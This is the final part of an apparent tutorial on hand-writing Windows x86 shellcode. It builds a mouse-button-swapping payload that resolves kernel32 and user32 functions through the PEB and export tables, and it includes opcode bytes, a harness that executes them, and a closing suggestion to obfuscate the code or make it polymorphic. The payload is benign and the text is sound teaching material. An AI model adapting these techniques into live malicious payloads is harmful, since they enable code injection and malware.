If you missed the first two parts of this article: Part I explains what a shellcode is, how it works and what its limitations are, and Part II covers the PEB (Process Environment Block) structure, the PE (.exe, .dll) file format and a short ASM introduction. You’ll need this information in order to properly understand Windows shellcodes.

In this last part of the shellcode development introduction, we will write a simple “SwapMouseButton” shellcode, a shellcode that swaps the left and right mouse buttons. We will start from an existing shellcode: “Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode”. The shellcode name tells us a few things, such as the functions it uses:

- URLDownloadToFile: Windows API function to download a file
- WinExec: to execute the file (executable file: .exe)
- ExitProcess: will terminate the process running the shellcode

Using this example, we will call SwapMouseButton function and ExitProcess function. I’m pretty sure it is easy to understand what these functions do.

    BOOL WINAPI SwapMouseButton(
        _In_ BOOL fSwap
    );

    VOID WINAPI ExitProcess(
        _In_ UINT uExitCode
    );

As you can see, each function has only one parameter:

fSwap parameter can be TRUE or FALSE. If it is TRUE, the mouse buttons are swapped, else they are restored.

uExitCode represents the process exit code. Each process must return a value on exit (zero if everything was ok, any other value otherwise). This is the “return 0” of the main function.

Program overview

So we need to call two functions. In C++, this takes only a couple of lines.
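A minimal sketch of such a program, assuming a Visual Studio project whose default settings already link against user32.lib, might look like this:

```cpp
#include <windows.h>

int main()
{
    // TRUE swaps the left and right buttons, FALSE restores them.
    SwapMouseButton(TRUE);

    // Returning from main ends the process, so no explicit ExitProcess call is needed.
    return 0;
}
```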

The compiler knows to link with the “user32” library and to find the function. But we must do this manually in the shellcode. We need to manually load the “user32” library, find the address of the “SwapMouseButton” function and call it.
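The manual variant can also be sketched in C++. This is only an illustration, not necessarily the exact program the shellcode was modelled on; the typedef name SwapMouseButtonFn is made up for this example, and its signature is copied from the prototype shown earlier.

```cpp
#include <windows.h>

// Hypothetical typedef matching the SwapMouseButton prototype.
typedef BOOL (WINAPI *SwapMouseButtonFn)(BOOL fSwap);

int main()
{
    // Load user32.dll by hand instead of relying on the linker.
    HMODULE user32 = LoadLibraryA("user32.dll");
    if (user32 == NULL)
        return 1;

    // Look up the function by name inside the loaded module.
    SwapMouseButtonFn swap =
        reinterpret_cast<SwapMouseButtonFn>(GetProcAddress(user32, "SwapMouseButton"));
    if (swap == NULL)
        return 1;

    swap(TRUE);
    return 0;
}
```

These are the same two steps (load the library, resolve the function) that the shellcode performs later on, except that the shellcode first has to locate GetProcAddress and LoadLibraryA by itself.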

Even when we load the library and resolve the function by hand in C++, the compiler still knows the addresses of the “LoadLibrary” and “GetProcAddress” functions. In the shellcode, we must find them programmatically.

Note that we do not have to call “ExitProcess” function in C++ because on “return 0” from “main” function, the program will be terminated, but from a shellcode we call it to make sure the program terminates gracefully and does not crash.

Shellcode overview

As we discussed in the previous parts, in order to make a reliable shellcode, we need to follow a few steps. We know what functions we have to call but first, we have to find these functions.

The necessary steps are the following:

1. Find where kernel32.dll is loaded into memory
2. Find its export table
3. Find the GetProcAddress function exported by kernel32.dll
4. Use GetProcAddress to find the address of the LoadLibrary function
5. Use LoadLibrary to load the user32.dll library
6. Find the address of the SwapMouseButton function within user32.dll
7. Call the SwapMouseButton function
8. Find the address of the ExitProcess function
9. Call the ExitProcess function

In order to write our shellcode, we will use Visual Studio 2015 (you can use any other version or an assembler such as masm, nasm etc.). In Visual Studio, we can use “__asm { }” in order to write ASM code directly.

Please make sure you have properly read and understood this part.

    #include "stdafx.h"

    int main()
    {
        __asm
        {
            // ASM code here
        }

        return 0;
    }

Find kernel32.dll base address

As you can see below, we can find where kernel32.dll library is loaded into memory using the following code:

    xor ecx, ecx
    mov eax, fs:[ecx + 0x30]  ; EAX = PEB
    mov eax, [eax + 0xc]      ; EAX = PEB->Ldr
    mov esi, [eax + 0x14]     ; ESI = PEB->Ldr.InMemOrder
    lodsd                     ; EAX = Second module
    xchg eax, esi             ; EAX = ESI, ESI = EAX
    lodsd                     ; EAX = Third(kernel32)
    mov ebx, [eax + 0x10]     ; EBX = Base address

(Lines 1-2) Let’s see what it does. It sets the ecx register to zero and uses it in the second instruction. But why? Remember when we talked about avoiding NULL bytes? The “mov eax, fs:[0x30]” instruction will be assembled into the following opcode sequence: “64 A1 30 00 00 00”, so we have NULL bytes, while the “mov eax, fs:[ecx + 0x30]” instruction will be assembled into “64 8B 41 30”. So this way it is possible to avoid NULL bytes.

(Lines 3-4) Now we have the PEB pointer in the eax register. As we saw in the previous blog post, at the 0xC offset we can find the Ldr. We follow that pointer, and in the Ldr at the 0x14 offset we have the “in memory order” modules list.
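The NULL byte check is easy to automate. The sketch below is only an illustration: the function name contains_null_byte and the two constants are made up for this example, and the byte values are the two opcode sequences quoted above.

```cpp
#include <algorithm>
#include <cstdint>
#include <vector>

// Returns true if the assembled bytes contain at least one 0x00 byte.
bool contains_null_byte(const std::vector<std::uint8_t>& opcodes)
{
    return std::find(opcodes.begin(), opcodes.end(), 0x00) != opcodes.end();
}

// mov eax, fs:[0x30]        (absolute offset, encoded with a 4-byte displacement)
const std::vector<std::uint8_t> mov_eax_fs_30 = {0x64, 0xA1, 0x30, 0x00, 0x00, 0x00};

// mov eax, fs:[ecx + 0x30]  (register + 1-byte displacement)
const std::vector<std::uint8_t> mov_eax_fs_ecx_30 = {0x64, 0x8B, 0x41, 0x30};
```

Calling contains_null_byte on the first sequence reports a NULL byte, while the second one passes, which is why the shellcode uses the ecx-relative form.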

(Lines 5-7) We are now placed on the “program.exe” module, on the “InMemoryOrderLinks”. Here, first element is “Flink”, a pointer to the next module. You can see that we placed this pointer in the esi register. The “lodsd” instruction will follow the pointer specified by the esi register and we will have the result in the eax register. This means that after the lodsd instruction we will have the second module, ntdll.dll, in the eax register. We place this pointer in the esi by exchanging the values of eax and esi and use again the lodsd instruction to reach the 3rd module: kernel32.dll.

(Line 8) At this point, we have in the eax register the pointer to “InMemoryOrderLinks” of kernel32.dll. Adding 0x10 bytes will give us the “DllBase” pointer, the address of memory where kernel32.dll is loaded. Target acquired!

Find the export table of kernel32.dll

We found kernel32.dll in memory. Now we need to parse this PE file and find the export table. This is not really complicated:

    mov edx, [ebx + 0x3c]  ; EDX = DOS->e_lfanew
    add edx, ebx           ; EDX = PE Header
    mov edx, [edx + 0x78]  ; EDX = Offset export table
    add edx, ebx           ; EDX = Export table
    mov esi, [edx + 0x20]  ; ESI = Offset names table
    add esi, ebx           ; ESI = Names table
    xor ecx, ecx           ; ECX = 0

(Lines 1-2) We know that we can find the “e_lfanew” pointer at the offset 0x3C, because the size of the MS-DOS header is 0x40 bytes and the last 4 bytes are the “e_lfanew” pointer. We add this value to the base address, because the pointer is relative to the base address (it is an offset).

(Lines 3-4) At the offset 0x78 of the PE header, we can find the “DataDirectory” for the exports. We know this because the size of all PE headers (Signature, FileHeader and OptionalHeader) before the DataDirectory is exactly 0x78 bytes and the export is the first entry in the DataDirectory table. Again, we add this value to the edx register and we are now placed on the export table of the kernel32.dll.

(Lines 5-7) In the IMAGE_EXPORT_DIRECTORY structure, at the offset 0x20 we can find the pointer to the “AddressOfNames” so we can get the exported function names. This is required because we try to find the function by its name even if it is possible using some other methods. We save the pointer in the esi register and set ecx register to 0 (you will see below why).
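The same three lookups can be sketched in C++ over a byte buffer. This is an illustration only: read_u32, ExportInfo and find_export_info are hypothetical names, and the buffer is assumed to hold a 32-bit image laid out as it is in memory, so that every offset is relative to the start of the buffer.

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

// Read a little-endian 32-bit value at byte offset `off` (bounds-checked by at()).
std::uint32_t read_u32(const std::vector<std::uint8_t>& image, std::size_t off)
{
    std::uint32_t value = 0;
    for (std::size_t i = 0; i < 4; ++i)
        value |= static_cast<std::uint32_t>(image.at(off + i)) << (8 * i);
    return value;
}

struct ExportInfo {
    std::uint32_t pe_header;         // value of e_lfanew
    std::uint32_t export_directory;  // offset of IMAGE_EXPORT_DIRECTORY
    std::uint32_t address_of_names;  // offset of the names table
};

ExportInfo find_export_info(const std::vector<std::uint8_t>& image)
{
    ExportInfo info{};
    info.pe_header        = read_u32(image, 0x3C);                         // DOS header -> e_lfanew
    info.export_directory = read_u32(image, info.pe_header + 0x78);        // first DataDirectory entry
    info.address_of_names = read_u32(image, info.export_directory + 0x20); // AddressOfNames
    return info;
}
```

The shellcode does the same thing, except that it adds the image base (ebx) after each read because it works with real pointers instead of buffer offsets.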

Find GetProcAddress function name

We are now placed on the “AddressOfNames”, an array of pointers (relative to the image base, the address where kernel32.dll is loaded into memory). So each 4 bytes will represent a pointer to a function name. We can find the function name, and the function name ordinal (the “number” of the GetProcAddress function) like this:

    Get_Function:

    inc ecx                              ; Increment the ordinal
    lodsd                                ; Get name offset
    add eax, ebx                         ; Get function name
    cmp dword ptr[eax], 0x50746547       ; GetP
    jnz Get_Function
    cmp dword ptr[eax + 0x4], 0x41636f72 ; rocA
    jnz Get_Function
    cmp dword ptr[eax + 0x8], 0x65726464 ; ddre
    jnz Get_Function

(Lines 1-3) The first line “does nothing”. It is a label, a name for a location we will jump back to in order to read the next function name, as you will see below. In line 3, we increment the ecx register, which is the counter of the function names we have read so far.

(Lines 4-5) We have in the esi register the pointer to the first function name. The lodsd instruction will place in eax the offset to the function name (e.g. “ExportedFunction”) and we add ebx (the kernel32 base address) to it in order to get the correct pointer. Note that the “lodsd” instruction will also increment the esi register by 4! This helps us because we do not have to increment it manually; we just need to execute lodsd again in order to get the next function name pointer.

(Lines 6-11) We now have in the eax register a correct pointer to the exported function name, a string, and we need to check whether it is “GetProcAddress”. In line 6, we compare the first 4 bytes of the name with 0x50746547. Written as bytes this is “50 74 65 47”, the ASCII values of “PteG”, which is “GetP” reversed. The order is reversed because x86 processors are little-endian: the least significant byte of a number is stored first in memory, so the bytes “G”, “e”, “t”, “P” in memory read back as the number 0x50746547. If the first 4 bytes are not “GetP”, the jnz instruction jumps back to our label and the search continues with the next function name. If they are, we also check the next 4 bytes, which must be “rocA”, and the following 4 bytes, “ddre”, to be sure we have not found some other function that starts with “GetP”.
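To work out these constants for another function name, a small helper is handy. The sketch below is an illustration; pack_le is a hypothetical name, and it simply builds the number a little-endian CPU would read from the given characters.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <string>

// Pack up to four characters into the dword a little-endian CPU reads from memory:
// the first character becomes the least significant byte.
std::uint32_t pack_le(const std::string& chunk)
{
    assert(chunk.size() <= 4);
    std::uint32_t value = 0;
    for (std::size_t i = 0; i < chunk.size(); ++i)
        value |= static_cast<std::uint32_t>(static_cast<unsigned char>(chunk[i])) << (8 * i);
    return value;
}
```

For example, pack_le("GetP") gives 0x50746547, pack_le("rocA") gives 0x41636f72 and pack_le("ddre") gives 0x65726464, the three values used in the comparisons above.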

Find the address of GetProcAddress function

At this point we only found the ordinal of the GetProcAddress function, but we can use it in order to find the actual address of this function:

    mov esi, [edx + 0x24]    ; ESI = Offset ordinals
    add esi, ebx             ; ESI = Ordinals table
    mov cx, [esi + ecx * 2]  ; CX = Number of function
    dec ecx
    mov esi, [edx + 0x1c]    ; ESI = Offset address table
    add esi, ebx             ; ESI = Address table
    mov edx, [esi + ecx * 4] ; EDX = Pointer(offset)
    add edx, ebx             ; EDX = GetProcAddress

(Lines 1-2) At this point we have in edx a pointer to the IMAGE_EXPORT_DIRECTORY structure. At the offset 0x24 of the structure we can find the “AddressOfNameOrdinals” offset. In line 2, we add this offset to ebx register which is the image base of the kernel32.dll so we get a valid pointer to the name ordinals table.

(Lines 3-4) The esi register contains the pointer to the name ordinals array, which holds two-byte entries. The ecx register holds our counter, and because we incremented it before checking each name, it is one higher than the zero-based index of the “GetProcAddress” name. Line 3 therefore reads the entry that follows the one belonging to GetProcAddress, and line 4 decrements the value that was read. This gives the right index into the address table as long as the name ordinals are consecutive numbers, which seems to be the case for kernel32.dll; the more general approach is to decrement ecx first and then read the entry at the name’s own index.

(Lines 5-6) At the offset 0x1c we can find the “AddressOfFunctions”, the pointer to the function pointer array. We just add the image base of kernel32.dll and we are placed at the beginning of the array.

(Lines 7-8) Now that we have the correct index for the “AddressOfFunctions” array in ecx, we just find the GetProcAddress function pointer (relative to the image base) at the AddressOfFunctions[ecx] location. We use “ecx * 4” because each pointer has 4 bytes and esi points to the beginning of the array. In line 8, we add the image base so we will have in edx the pointer to the GetProcAddress function. Target acquired!
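The relationship between the three export tables may be easier to see in a small model. The sketch below is not the shellcode’s exact logic: it uses the general form of the lookup (name index, then name ordinal, then function address), and ExportTables and find_export_rva are hypothetical names, with the names table already resolved to strings for simplicity.

```cpp
#include <cstddef>
#include <cstdint>
#include <string>
#include <vector>

struct ExportTables {
    std::vector<std::string>   names;      // AddressOfNames, resolved to strings
    std::vector<std::uint16_t> ordinals;   // AddressOfNameOrdinals, parallel to names
    std::vector<std::uint32_t> functions;  // AddressOfFunctions (offsets from the image base)
};

// Returns the offset of the function called `wanted`, or 0 if no such name is exported.
std::uint32_t find_export_rva(const ExportTables& tables, const std::string& wanted)
{
    for (std::size_t i = 0; i < tables.names.size(); ++i) {
        if (tables.names[i] == wanted) {
            std::uint16_t index = tables.ordinals.at(i); // two-byte entry for this name
            return tables.functions.at(index);           // four-byte entry for the function
        }
    }
    return 0;
}
```

Adding the image base to the returned offset gives the real function pointer, which is what the last “add edx, ebx” does.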

Find the LoadLibrary function address

The bad news is that we didn’t do anything “useful” up to this point. The good news is that we did what was complicated and now we can have fun!

    xor ecx, ecx     ; ECX = 0
    push ebx         ; Kernel32 base address
    push edx         ; GetProcAddress
    push ecx         ; 0
    push 0x41797261  ; aryA
    push 0x7262694c  ; Libr
    push 0x64616f4c  ; Load
    push esp         ; "LoadLibraryA"
    push ebx         ; Kernel32 base address
    call edx         ; GetProcAddress(LL)

(Lines 1-3) First, we set ecx to zero because we will use it later. Then, in lines two and three, we save on the stack for later use ebx, which is the kernel32 base address, and edx, which is the pointer to the GetProcAddress function.

(Lines 4-10) Now we have to make the following call: GetProcAddress(kernel32, “LoadLibraryA”). We have the kernel32 address, but how can we use a string? We will use again the stack. We will place the “LoadLibraryA\0” string on the stack. Yes, the string must be NULL terminated so this is why we set ecx to 0 and on line 4 we place it on the stack. We place the “LoadLibraryA” string on the stack 4 bytes at a time, in reverse order. We place first “aryA”, then “Libr” and then “Load” so the string on the stack will be “LoadLibraryA”. Done! Now, as we placed the data on the stack, the esp register, the stack pointer, will point to the beginning of our “LoadLibraryA” string. We now place the function parameters on the stack, from the last one to the first one, so first the esp in line 8, then the ebx, kernel32 base address on line 9 and we call edx which is the GetProcAddress pointer. And that’s all!

Note that we placed on the stack “LoadLibraryA”, not only “LoadLibrary”. This is because the kernel32.dll does not export a “LoadLibrary” function, instead it exports two functions: “LoadLibraryA” which is used for ANSI string parameters and “LoadLibraryW” which is used for Unicode string parameters.
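Working out the push values by hand gets tedious for longer names, so here is a small helper sketch. The name push_sequence is made up for this example, and it assumes the string length is a multiple of 4; the terminating zero still has to be pushed separately beforehand, as in the listing above.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <string>
#include <vector>

// Returns the dword values in the order they must be pushed so that `text`
// ends up readable at esp. Assumes text.size() is a multiple of 4.
std::vector<std::uint32_t> push_sequence(const std::string& text)
{
    assert(text.size() % 4 == 0);
    std::vector<std::uint32_t> pushes;
    // Walk the string from its last 4-byte chunk to its first one.
    for (std::size_t pos = text.size(); pos >= 4; pos -= 4) {
        std::uint32_t dword = 0;
        for (std::size_t i = 0; i < 4; ++i) {
            unsigned char c = static_cast<unsigned char>(text[pos - 4 + i]);
            dword |= static_cast<std::uint32_t>(c) << (8 * i); // little-endian packing
        }
        pushes.push_back(dword);
    }
    return pushes;
}
```

For “LoadLibraryA” this yields 0x41797261, 0x7262694c and 0x64616f4c, in that order, matching the three push instructions in the listing.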

Load user32.dll library

We previously found the LoadLibrary function address. We will use it now to load into memory the “user32.dll” library, which contains our SwapMouseButton function.

    add esp, 0xc     ; pop "LoadLibraryA"
    pop ecx          ; ECX = 0
    push eax         ; EAX = LoadLibraryA
    push ecx
    mov cx, 0x6c6c   ; ll
    push ecx
    push 0x642e3233  ; 32.d
    push 0x72657375  ; user
    push esp         ; "user32.dll"
    call eax         ; LoadLibrary("user32.dll")

(Lines 1-3) As you saw, we placed the “LoadLibraryA” string on the stack before, so we have to get rid of it. Instead of three “pops”, the easiest way is to add 0xc (the 12 bytes of the string) to the esp register and we are done. In line two, we also remove the 0 placed on the stack before calling the function, which sets the ecx register to 0. We now back up the LoadLibrary function address on the stack for future use; as you know, after calling a function, the return value is in the eax register.

(Lines 4-10) We want to call “LoadLibrary(“user32.dll”)”, so again we need to place a string on the stack. It is a bit more tricky now, because the string length is not a multiple of 4 bytes and we cannot place it directly with a few push instructions. Instead, we first place ecx, which is 0, on the stack, then we use the cx register to hold the “ll” string. The cx register is the lower half (the low 16 bits) of ecx, so the upper half stays 0 and pushing ecx places “ll” followed by two NULL bytes on the stack. In lines 7-8 we place the “user32.d” string, so now at esp we have the “user32.dll” string. We push this pointer as the parameter and call LoadLibrary, which returns in eax the user32.dll base address, the address where the DLL is loaded into memory. We will need it later.

Get SwapMouseButton function address

We loaded into memory the user32.dll library, now we want to call GetProcAddress to get the address of the SwapMouseButton function.

    add esp, 0x10                    ; Clean stack
    mov edx, [esp + 0x4]             ; EDX = GetProcAddress
    xor ecx, ecx                     ; ECX = 0
    push ecx
    mov ecx, 0x616E6F74              ; tona
    push ecx
    sub dword ptr[esp + 0x3], 0x61   ; Remove "a"
    push 0x74754265                  ; eBut
    push 0x73756F4D                  ; Mous
    push 0x70617753                  ; Swap
    push esp                         ; "SwapMouseButton"
    push eax                         ; user32.dll address
    call edx                         ; GetProc(SwapMouseButton)

(Lines 1-2) As before, we have to clean the stack. In line two, we place in the edx register the GetProcAddress function address which we saved before. Note that eax, ecx and edx are not preserved across a function call, so they will probably have been modified.

(Lines 3-13) We want to call “GetProcAddress(user32.dll, “SwapMouseButton”)” so again we have to place a string on the stack. First, in lines 3-4 we set the ecx register to 0 and place it on the stack. Second, we place “tona” on the stack. The “ton” string represents the last 3 bytes of the “SwapMouseButton” string, but we also place an “a” character as filler. This is a trick: in line 7, we subtract 0x61 from the stack location where we placed that “a” character. “a” is 0x61, so this transforms the “a” character into NULL. Now, as before, we place the rest of the string on the stack. We push the eax register which contains the user32.dll base address and call the GetProcAddress function. Please note that you can do this however you want; there may be easier ways to do it, so just have fun!
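The effect of the filler trick on the pushed bytes can be modelled in a few lines. This is a simplified sketch with a made-up function name: it only looks at the four bytes written by the push, whereas the real “sub” instruction operates on a dword starting at esp + 3. Since the byte there is exactly 0x61, no borrow reaches the following bytes.

```cpp
#include <array>
#include <cstdint>

// Models "push value" followed by "sub dword ptr [esp + 3], filler" and
// returns the four pushed bytes as they lie in memory (lowest address first).
std::array<std::uint8_t, 4> push_then_clear_last(std::uint32_t value, std::uint8_t filler)
{
    std::array<std::uint8_t, 4> bytes = {{
        static_cast<std::uint8_t>(value),
        static_cast<std::uint8_t>(value >> 8),
        static_cast<std::uint8_t>(value >> 16),
        static_cast<std::uint8_t>(value >> 24)
    }};
    // The byte at esp + 3 is the last character of the chunk.
    bytes[3] = static_cast<std::uint8_t>(bytes[3] - filler);
    return bytes;
}
```

With the values from the listing, push_then_clear_last(0x616E6F74, 0x61) leaves the bytes “t”, “o”, “n” and a NULL terminator, without a single NULL byte appearing in the shellcode itself.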

Call SwapMouseButton function

Cool, we have the address of the SwapMouseButton function, we just need to call it using the “true” parameter.

    add esp, 0x14  ; Cleanup stack
    xor ecx, ecx   ; ECX = 0
    inc ecx        ; true
    push ecx       ; 1
    call eax       ; Swap!

(Lines 1-5) I know it’s boring, but we have to clean the stack. We want to call “SwapMouseButton(true)” so “SwapMouseButton(1)” so we need to push the “1” value on the stack. We just set ecx register to 0 and increment it. We place it on the stack and call the SwapMouseButton function. If you want to restore the mouse functionality, just remove the “inc ecx” instruction.

Get ExitProcess function address

Phew, we did our stuff, but we want to gracefully exit the process so we need to find the ExitProcess function within kernel32.dll.

    add esp, 0x4                     ; Drop saved LoadLibraryA address
    pop edx                          ; GetProcAddress
    pop ebx                          ; kernel32.dll base address
    mov ecx, 0x61737365              ; essa
    push ecx
    sub dword ptr [esp + 0x3], 0x61  ; Remove "a"
    push 0x636f7250                  ; Proc
    push 0x74697845                  ; Exit
    push esp                         ; "ExitProcess"
    push ebx                         ; kernel32.dll base address
    call edx                         ; GetProc(ExitProcess)

(Lines 1-3) Again, we clean the stack. SwapMouseButton uses the stdcall convention (WINAPI), so it has already removed the “1” parameter from the stack itself; the add in line 1 discards the LoadLibraryA address we saved earlier and no longer need. We then pop the data we backed up at the beginning: the GetProcAddress function address into the edx register and the kernel32 base address into the ebx register.

(Lines 4-11) As you are already familiar with, we place on the stack the “ExitProcessa” string and replace the last “a” character with a NULL byte. We place the parameters on the stack and call GetProcAddress to get the ExitProcess function address.

Call the ExitProcess function

Finally, we call the ExitProcess function like this: “ExitProcess(0)”.

    xor ecx, ecx  ; ECX = 0
    push ecx      ; Return code = 0
    call eax      ; ExitProcess

(Lines 1-3) We have to place a “0” on the stack, so we just set ecx to 0, place it on the stack and call the ExitProcess function. And that’s all.

Final shellcode

Now we just need to add all parts together and the final shellcode is the following:

    xor ecx, ecx
    mov eax, fs:[ecx + 0x30]             ; EAX = PEB
    mov eax, [eax + 0xc]                 ; EAX = PEB->Ldr
    mov esi, [eax + 0x14]                ; ESI = PEB->Ldr.InMemOrder
    lodsd                                ; EAX = Second module
    xchg eax, esi                        ; EAX = ESI, ESI = EAX
    lodsd                                ; EAX = Third(kernel32)
    mov ebx, [eax + 0x10]                ; EBX = Base address
    mov edx, [ebx + 0x3c]                ; EDX = DOS->e_lfanew
    add edx, ebx                         ; EDX = PE Header
    mov edx, [edx + 0x78]                ; EDX = Offset export table
    add edx, ebx                         ; EDX = Export table
    mov esi, [edx + 0x20]                ; ESI = Offset names table
    add esi, ebx                         ; ESI = Names table
    xor ecx, ecx                         ; ECX = 0

    Get_Function:

    inc ecx                              ; Increment the ordinal
    lodsd                                ; Get name offset
    add eax, ebx                         ; Get function name
    cmp dword ptr[eax], 0x50746547       ; GetP
    jnz Get_Function
    cmp dword ptr[eax + 0x4], 0x41636f72 ; rocA
    jnz Get_Function
    cmp dword ptr[eax + 0x8], 0x65726464 ; ddre
    jnz Get_Function
    mov esi, [edx + 0x24]                ; ESI = Offset ordinals
    add esi, ebx                         ; ESI = Ordinals table
    mov cx, [esi + ecx * 2]              ; Number of function
    dec ecx
    mov esi, [edx + 0x1c]                ; Offset address table
    add esi, ebx                         ; ESI = Address table
    mov edx, [esi + ecx * 4]             ; EDX = Pointer(offset)
    add edx, ebx                         ; EDX = GetProcAddress

    xor ecx, ecx                         ; ECX = 0
    push ebx                             ; Kernel32 base address
    push edx                             ; GetProcAddress
    push ecx                             ; 0
    push 0x41797261                      ; aryA
    push 0x7262694c                      ; Libr
    push 0x64616f4c                      ; Load
    push esp                             ; "LoadLibraryA"
    push ebx                             ; Kernel32 base address
    call edx                             ; GetProcAddress(LL)

    add esp, 0xc                         ; pop "LoadLibraryA"
    pop ecx                              ; ECX = 0
    push eax                             ; EAX = LoadLibraryA
    push ecx
    mov cx, 0x6c6c                       ; ll
    push ecx
    push 0x642e3233                      ; 32.d
    push 0x72657375                      ; user
    push esp                             ; "user32.dll"
    call eax                             ; LoadLibrary("user32.dll")

    add esp, 0x10                        ; Clean stack
    mov edx, [esp + 0x4]                 ; EDX = GetProcAddress
    xor ecx, ecx                         ; ECX = 0
    push ecx
    mov ecx, 0x616E6F74                  ; tona
    push ecx
    sub dword ptr[esp + 0x3], 0x61       ; Remove "a"
    push 0x74754265                      ; eBut
    push 0x73756F4D                      ; Mous
    push 0x70617753                      ; Swap
    push esp                             ; "SwapMouseButton"
    push eax                             ; user32.dll address
    call edx                             ; GetProc(SwapMouseButton)

    add esp, 0x14                        ; Cleanup stack
    xor ecx, ecx                         ; ECX = 0
    inc ecx                              ; true
    push ecx                             ; 1
    call eax                             ; Swap!

    add esp, 0x4                         ; Drop saved LoadLibraryA address
    pop edx                              ; GetProcAddress
    pop ebx                              ; kernel32.dll base address
    mov ecx, 0x61737365                  ; essa
    push ecx
    sub dword ptr [esp + 0x3], 0x61      ; Remove "a"
    push 0x636f7250                      ; Proc
    push 0x74697845                      ; Exit
    push esp                             ; "ExitProcess"
    push ebx                             ; kernel32.dll base address
    call edx                             ; GetProc(ExitProcess)

    xor ecx, ecx                         ; ECX = 0
    push ecx                             ; Return code = 0
    call eax                             ; ExitProcess

And this is how we wrote our first (useful) shellcode!

Testing the shellcode

We can test the shellcode with the following code:

    #include "stdafx.h"
    #include <Windows.h>

    int main()
    {
        char *shellcode =
            "\x33\xC9\x64\x8B\x41\x30\x8B\x40\x0C\x8B\x70\x14\xAD\x96\xAD\x8B\x58\x10\x8B\x53\x3C\x03\xD3\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
            "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72\x65\x75"
            "\xE2\x8B\x72\x24\x03\xF3\x66\x8B\x0C\x4E\x49\x8B\x72\x1C\x03\xF3\x8B\x14\x8E\x03\xD3\x33\xC9\x53\x52\x51\x68\x61\x72\x79\x41\x68"
            "\x4C\x69\x62\x72\x68\x4C\x6F\x61\x64\x54\x53\xFF\xD2\x83\xC4\x0C\x59\x50\x51\x66\xB9\x6C\x6C\x51\x68\x33\x32\x2E\x64\x68\x75\x73"
            "\x65\x72\x54\xFF\xD0\x83\xC4\x10\x8B\x54\x24\x04\x33\xC9\x51\xB9\x74\x6F\x6E\x61\x51\x83\x6C\x24\x03\x61\x68\x65\x42\x75\x74\x68"
            "\x4D\x6F\x75\x73\x68\x53\x77\x61\x70\x54\x50\xFF\xD2\x83\xC4\x14\x33\xC9"
            "\x41" // inc ecx - Remove this to restore the functionality
            "\x51\xFF\xD0\x83\xC4\x04\x5A\x5B\xB9\x65\x73\x73\x61"
            "\x51\x83\x6C\x24\x03\x61\x68\x50\x72\x6F\x63\x68\x45\x78\x69\x74\x54\x53\xFF\xD2\x33\xC9\x51\xFF\xD0";

        // Set memory as executable
        DWORD old = 0;
        BOOL ret = VirtualProtect(shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, &old);

        // Call the shellcode
        __asm
        {
            jmp shellcode;
        }

        return 0;
    }

Conclusion

I hope you have learned step by step how a Windows shellcode works and that you are now able to customize the ASM code we have created in this article. Even if this shellcode does not do anything very useful, it is a good starting point for writing one yourself.

You may try to obfuscate it, to create an alphanumeric one or even a polymorphic one. I suggest you try to write your own shellcode in order to really understand the challenges behind writing this type of code.